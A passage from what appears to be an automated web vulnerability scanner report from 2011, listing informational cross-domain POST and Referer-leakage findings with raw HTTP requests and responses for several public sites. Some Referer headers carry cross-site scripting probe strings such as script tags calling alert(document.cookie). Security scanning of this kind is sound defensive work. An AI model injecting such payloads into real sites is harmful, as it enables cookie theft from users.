hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a></span><span class="connect_widget_error_span hidden_elem">&nbs
...[SNIP]...

16.3. http://www8.tucows.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www8.tucows.com
Path:   /delivery/afr.php

Request 1

GET /delivery/afr.php?zoneid=65&cb=ffeae4cd HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 1

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:00 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1277

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://www8.tucows.com/delivery/ck.php?oaparams=2__bannerid=1336__zoneid=65__OXLCA=1__cb=367b59503e__oadest=http%3A%2F%2Fcm4.upclick.com%2Fclick.aspx%3Fuid%3D1001952%26crid%3D2237%26wid%3D1365%26dest%3Dhttp%253A%252F%252Ffixio%252Dpc%252Dcleaner.com%26cmp%3DFPC_tucows%26key1%3Dwsdb%26key2%3D1%26utm_source%3Dtucows%26utm_medium%3Dbanner%26utm_campaign%3DFPC_tucows' target='_blank'><img src='http://www-s.tucows.com/i/ads/LuLuSoftware/fixio-btn_160_.gif' width='160' height='50' alt='' title='' border='0' /></a><div id='beacon_367b59503e' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www8.tucows.com/delivery/lg.php?bannerid=1336&amp;campaignid=520&amp;zoneid=65&amp;loc=http%3A%2F%2Fadvertise.tucows.com%2F%3F41f20%2522-alert%281%29-%2522c17f4a73141%3D1&amp;cb=367b59503e' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

Request 2

GET /delivery/afr.php?zoneid=65&cb=ffeae4cd HTTP/1.1
Host: www8.tucows.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a

Response 2

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:45:23 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=f41efd0364d75038834b62f043c90f9a; expires=Sat, 04-Feb-2012 17:45:23 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 1185

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://www8.tucows.com/delivery/ck.php?oaparams=2__bannerid=1336__zoneid=65__OXLCA=1__cb=e1f1710f87__oadest=http%3A%2F%2Fcm4.upclick.com%2Fclick.aspx%3Fuid%3D1001952%26crid%3D2237%26wid%3D1365%26dest%3Dhttp%253A%252F%252Ffixio%252Dpc%252Dcleaner.com%26cmp%3DFPC_tucows%26key1%3Dwsdb%26key2%3D1%26utm_source%3Dtucows%26utm_medium%3Dbanner%26utm_campaign%3DFPC_tucows' target='_blank'><img src='http://www-s.tucows.com/i/ads/LuLuSoftware/fixio-btn_160_.gif' width='160' height='50' alt='' title='' border='0' /></a><div id='beacon_e1f1710f87' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://www8.tucows.com/delivery/lg.php?bannerid=1336&amp;campaignid=520&amp;zoneid=65&amp;cb=e1f1710f87' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

17. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlastravelweb.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET / HTTP/1.1
Host: www.atlastravelweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68752
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSCCAAQS=KOLLNFNAIMDDAJHLAICANGDC; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:48:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<td align="right">
   <form method="post" action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8" onsubmit="return verifyRequired();" >
       <input type="hidden" name="redirect" value="http://www.atlastravelweb.com/subscribesuccess.html" />
...[SNIP]...

18. Cross-domain Referer leakage  previous  next
There are 144 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


18.1. http://abcnews.go.com/Sports/wireStory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /Sports/wireStory

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Sports/wireStory?id\\x3d9879786\\x22 HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:31:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc05
X-Powered-By: ASP.NET
Set-Cookie: SWID=A93C51CB-CB6B-4022-9295-A98B1327E20F; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...
</script>

<script type="text/javascript" src="http://a.abcnews.com/assets/js/smartphoneLoad.js"></script>
...[SNIP]...
<link rel="canonical" href="http://abcnews.go.com" />
<script language="javascript1.1" type="text/javascript" src="http://a.abcnews.com/assets/js/hbx-config.js"></script>


<link type="text/css" rel="stylesheet" media="screen, print" href="http://a.abcnews.com/assets/css/common.css" />
<link type="text/css" rel="stylesheet" media="screen, print" href="http://a.abcnews.com/assets/css/pane.css" />
<link type="text/css" rel="stylesheet" media="screen, print" href="http://a.abcnews.com/assets/css/baseindex.css" />

<script type="text/javascript" src="http://a.abcnews.com/assets/js/common.js"></script>

<script type="text/javascript" src="http://a.abcnews.com/assets/js/pane.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/playlist.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/animation.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/easing.js"></script>
<script type="text/javascript" src="http://a.abcnews.com/assets/js/tooltip.js"></script>

<script type="text/javascript" src="http://a.abcnews.com/assets/js/jquery/jquery-1.2.6.min.js"></script>
...[SNIP]...
<div class="window">
<script language="javascript" type="text/javascript" src="http://a.abcnews.com/assets/static/wrapper/header.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a.abcnews.com/assets/static/wrapper/footer.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://a.abcnews.com/assets/js/s_code.js"></script>
...[SNIP]...

18.2. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6376

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 14:31:01 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
lB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443http%3a%2f%2ft-mobile-coverage.t-mobile.com/4G-Network-Coverage%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%25208bEpBc"><img src="http://s0.2mdn.net/998766/0328_160x600_Winter_Largest4GNetwork_DataPlan_Static.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.24

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3671.TMP/B5159652.24;sz=728x90;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKC_99*KEM_115*tlB_3443735*xeM_3247**15stqp6ba7xf0___3533310**0_3805*MXc_114**_-862839443;ord=5575236558291927040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:59:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6367

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 13:59:07 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
lB_3443735*xeM_3247**15stqp6ba7xf0___3533310**0_3805*MXc_114**_-862839443http%3a%2f%2ft-mobile-coverage.t-mobile.com/4G-Network-Coverage%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%25208bEpBc"><img src="http://s0.2mdn.net/998766/0328_728x90_Winter_Largest4GNetwork_DataPlan_Static.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

18.4. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 04 Feb 2011 13:36:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4976

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page M
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
a4/3/0/%2a/j%3B233945144%3B0-0%3B0%3B57848002%3B3454-728/90%3B36222475/36240353/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/1-ps_genericV5_728x90_30k.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>

<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848002&advid=2179194&sid=973580&adid='></script>
...[SNIP]...

18.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4965
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:54:50 GMT
Expires: Fri, 04 Feb 2011 17:54:50 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
a4/3/0/%2a/y%3B233945144%3B1-0%3B0%3B57848002%3B3454-728/90%3B38208490/38226247/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/HYSA_RL_728x90_20k.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>

<!-- start DV tag-->
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57848002&advid=2179194&sid=973580&adid='></script>
...[SNIP]...

18.6. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:59:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/js?plid=23663"></script>
...[SNIP]...

18.7. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 03 Feb 2011 22:00:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 238

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.trafficmp.com/a/js?plid=23659"></script>
...[SNIP]...

18.8. http://ad.doubleclick.net/adi/lb.buzzillions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 04 Feb 2011 01:48:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1120

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script language="JavaScript">ord = window.ord || Math.floor(M
